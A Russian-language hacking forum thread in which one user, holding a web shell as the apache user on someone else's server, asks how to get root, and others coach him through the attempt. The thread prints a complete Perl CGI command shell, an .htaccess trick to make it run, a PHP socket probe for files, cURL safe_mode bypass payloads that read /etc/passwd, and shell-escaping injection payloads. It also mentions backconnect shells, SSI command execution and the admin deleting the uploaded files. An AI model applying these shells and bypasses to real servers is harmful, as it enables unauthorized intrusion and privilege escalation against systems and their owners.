|
Как пробиться к корню?
Получил шел с правами апача.
А там админ права хорошо раставил да еще поотключал много чево. Выйти дальше /var/www/ немогу. Прочитать /etc/passwd тоже немогу Выполнять каманды опять же немогу. В конфиге пас некуда неподходит кроме базы сайта. Народ подскажите что можно сделать в таком случае? Как пробиться к корню? safe_mode: ON Disable functions: symlink dl shell_exec exec system passthru popen proc_open proc_nice proc_get_status proc_close proc_terminate posix_mkfifo set_time_limit imap_open imap_body imap_list imap_createmailbox imap_deletemailbox imap_renamemailbox mb_send_mail |
Есть доступ кронтабы посмотреть? /etc/crontab
Может там скрипты выполняются от пользователей с более большими привилегиями. И скрипты доступные для редактирования апача. Версию ОС знаешь? Список пользователей в системе? Бэкконект или биндшел пробовал установить? |
Чувак про курл забыл :)
http://securityvulns.ru/Mdocument888.html попробуй еще это http://securityvulns.ru/news/PHP/htacces/safemodebypas.html |
procedure
Просмотреть я нечево немогу дальше /var/www/ Нашел файл на редатирование под пользователем. Но из этого нечего неполучилось все осталось попрежнему только права стали (ingres). Linux 2.6.22-ovz005_openVZ #3 SMP Wed Feb 13 17:25:54 EET 2008 x86_64 Списка пользователей я немогу узнать прав нехватает. Команды выполнять немогу на серваке запрещено. Бэкконект или биндшел некатит режется. |
ChaaK
Какой курл мне закачивать нечево ненадо. Сылку посмотрю. |
Или вот посмотри: xakep.ru/post/26964/default.asp
Тут главная задача норм шелл получить, а ядро там не очень новое. |
2 Ky3bMu4 2008 года это неочень новое?патченное ядрышко..вполне приличное.
2 ТС - можешь спокойно забить на сервак.много ты не потеряешь, только время убьешь зря... ибо запрещены Цитата:
|
Цитата:
но это непошло там немного править надо. задача да норм шел получить только как? сейфмод жоско рубит все. |
Цитата:
потерять можно и много. а время и так много убил. |
cgi-bin дира есть? если есть,лей цгишный\перловый шелл..ограничения отпадут практически.
|
Цитата:
cgi-bin в вебе есть но записать прав нехватает. страно права пользователя файла а редактить немогу. там файло лежит но их редактить немогу. при запуске их ошибка 500. вот через это можно узнать есть файл или нету. <?php $fp = fsockopen ("unix://../../../../../../etc/passwd",0); if ($fp) { fclose ($fp); } ?> если файл есть ответ : Permission denied если файла нету ответ : No such file or directory |
не обязательно cgi-bin для перл шелла
выбирай любую диру, лей туда .htaccess Options Indexes FollowSymLinks ExecCGI AppType application/x-httpd-cgi .pl и лей в эту диру .pl шелл |
если apache работает с mod_include, то можно выполнять команды посредством SSI
https://forum.antichat.ru/showthread.php?t=37928 |
Цитата:
да apache работает с mod_include. попробовал в ответ чистая страница в коде тож нема. ошибок небыло.вроде проходит запрос а ответ режется. на хакер.ру есть видео по проникновению на Agnitum.com там также приминялся этот способ. |
Цитата:
залил .htaccess и shell.pl в диру с правами. при запросе к shell.pl вылезла ошибка 500. после решил перезаписать .htaccess вылезла опять ошибка 500. потом обратился к sh.php и снова ошибка 500. все лежало в одной папке. недоумение! и папка пропала О_О. админ не дремлет. снес ее. придется терь ждать пока успокоится. |
1west
чмод 755 на перл шелл поставил? |
Цитата:
|
Цитата:
|
1west
в пшп есть функция chmod() ;) chmod('file',0755) Помойму так, при сейф моде она работает |
Цитата:
в .htaccess прописал это Options Indexes Options FollowSymLinks ExecCGI AddType application/x-httpd-cgi .pl php шел нормально работает а перловый выдает ошибка 500. шел вот этот #!/usr/bin/perl use CGI qw/-no_xhtml :standard/; use CGI::Carp qw(fatalsToBrowser); print header(-charset => 'windows-1251'), start_html(-lang => 'ru', -title => 'My shell', # установим курсор в поле ввода команд -onLoad => "document.forms[0].vvod.focus()"); if ( param() ) { # если мы ввели команду my $vvod = param('vvod'); # покажем нашу команду для самоконтроля print $vvod, "<br>\n"; # установим таймаут в секундах для выхода из нашей команды, # если она задержалась с ответом my $timeout = 30; # анонимная подпрограммочка для обработки таймаута local $SIG{ALRM} = sub { close KAN; print 'Процесс прерван по таймауту</pre>'; die "timeout"; }; # вот и сам «шелл» $pid = open(KAN, "$vvod 2>&1 |"); die "Cannot run program: $!.\n" unless ($pid); eval { alarm($timeout); print '<pre>'; # читаем вывод команды и направляем его на дисплей while( <KAN> ) { print; } print '</pre>'; alarm(0); close KAN; } } # генерируем форму ввода команды print start_form, textfield(-name=>'vvod', -size=> 80, -value=> ''), submit('удачи!'), endform, end_html; exit(0); |
попробуй какой нить нормльный шелл, типа р57, а то этот палёный какой то)
|
Цитата:
ошибка 500. когда через r57.php ставлю чмод на файл он чмодит а сам шел обнуляется. |
Позвони одмину,скажи что он выйграл и пускай расскажет что он та мнамудрил)))
Так как если перловка не запускаецо,а она запускается только при 755(это макс для нее) то думаю ты так и останишься в первоночальной дире. |
Цитата:
уже звоню :) а может быть перла там нету. или запрещено этому пользователю перл скрипт выполнять. |
по ip нашел еще 1 сайт на томже хосте.
на нем удоленый инклуд. allow_url_fopen : On все зделал как и на другом такаяже проблема ошибка 500. повидемому админ урезал права пользователям на перл. ошибка чтения /etc/passwd Warning: main() open_basedir restriction in effect. File(../../../../../etc/passwd) is not within the allowed path(s): (/var/www/ru:/usr/lib/php:/tmp) |
Цитата:
Цитата:
|
Цитата:
почему я в паке /tmp тоже могу смотреть а вот в дугих уже нет. через сокет можно узнавать определеные файл есть или нету в /etc. только что это даст! |
Цитата:
|
/etc/passwd
и т.п можешь попробовать прочесть с шелла "* ernealizm *" через file id. правь сорцы для своих нужд. |
Цитата:
версия php какая? возможно для твоей версии есть способ обхода ограничений google.com/?q=open_basedir+bypass |
Цитата:
в /usr/lib/php я зайти не могу. пишет незя а в ошибке показывает что можно. PHP Version 5.2.5-pl1-gentoo Apache 2.0 Handler |
Цитата:
есть сылка? |
вот нашел
http://groups.google.pl/group/mailing.unix.bugtraq/browse_thread/thread/fad2925061ad312d PHP 5.2.5 cURL safe_mode bypass The first issue [SAFE_MODE bypass] var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00".__FILE__))); the last step in curl_init() function will only copy file://safe_mode_bypass to urlcopy. The main problem exists in php_url_parse_ex() function. If you put in curl_init() "file://host/somewhere/path.php", php_url_parse_ex() will select /somewhere/path.php to path varible. Looks good but it cannot be used, when you will check real path. Using file:///etc/passwd is correct but between file:// and /etc/passwd, php_url_parse_ex() will select host and return path to /passwd. как норм запрос составить делаю var_dump(curl_exec(curl_init("file://etc/passwd"))); белая страница с надписью bool(false) как я понел файл должен скопироваться? |
var_dump(curl_exec(curl_init("file://etc/passwd\x00".__FILE__)));
|
если так
var_dump(curl_exec(curl_init("file:///etc/passwd"))); ответ Warning: curl_init() [function.curl-init]: open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/var/www/ru:/usr/lib/php:/tmp) in /var/www/ru/1.php on line 2 Warning: curl_exec(): supplied argument is not a valid cURL handle resource in /var/www/ru/1.php on line 2 bool(false) |
Цитата:
bool(false) может заплатка какая стоит? |
вот по свежее выполнение команд
http://securityvulns.ru/Tdocument809.html [1] escapeshellcmd() escapeshellcmd("echo ".chr(0xc0).";id"); [2] escapeshellarg() $arg1 = chr(0xc0); $arg2 = "; id ; #"; $cmd = "echo ".escapeshellarg($arg1)." ".escapeshellarg($arg2); после этого белая страница. вывода команды нету. ошибок тоже. |
| Время: 01:32 |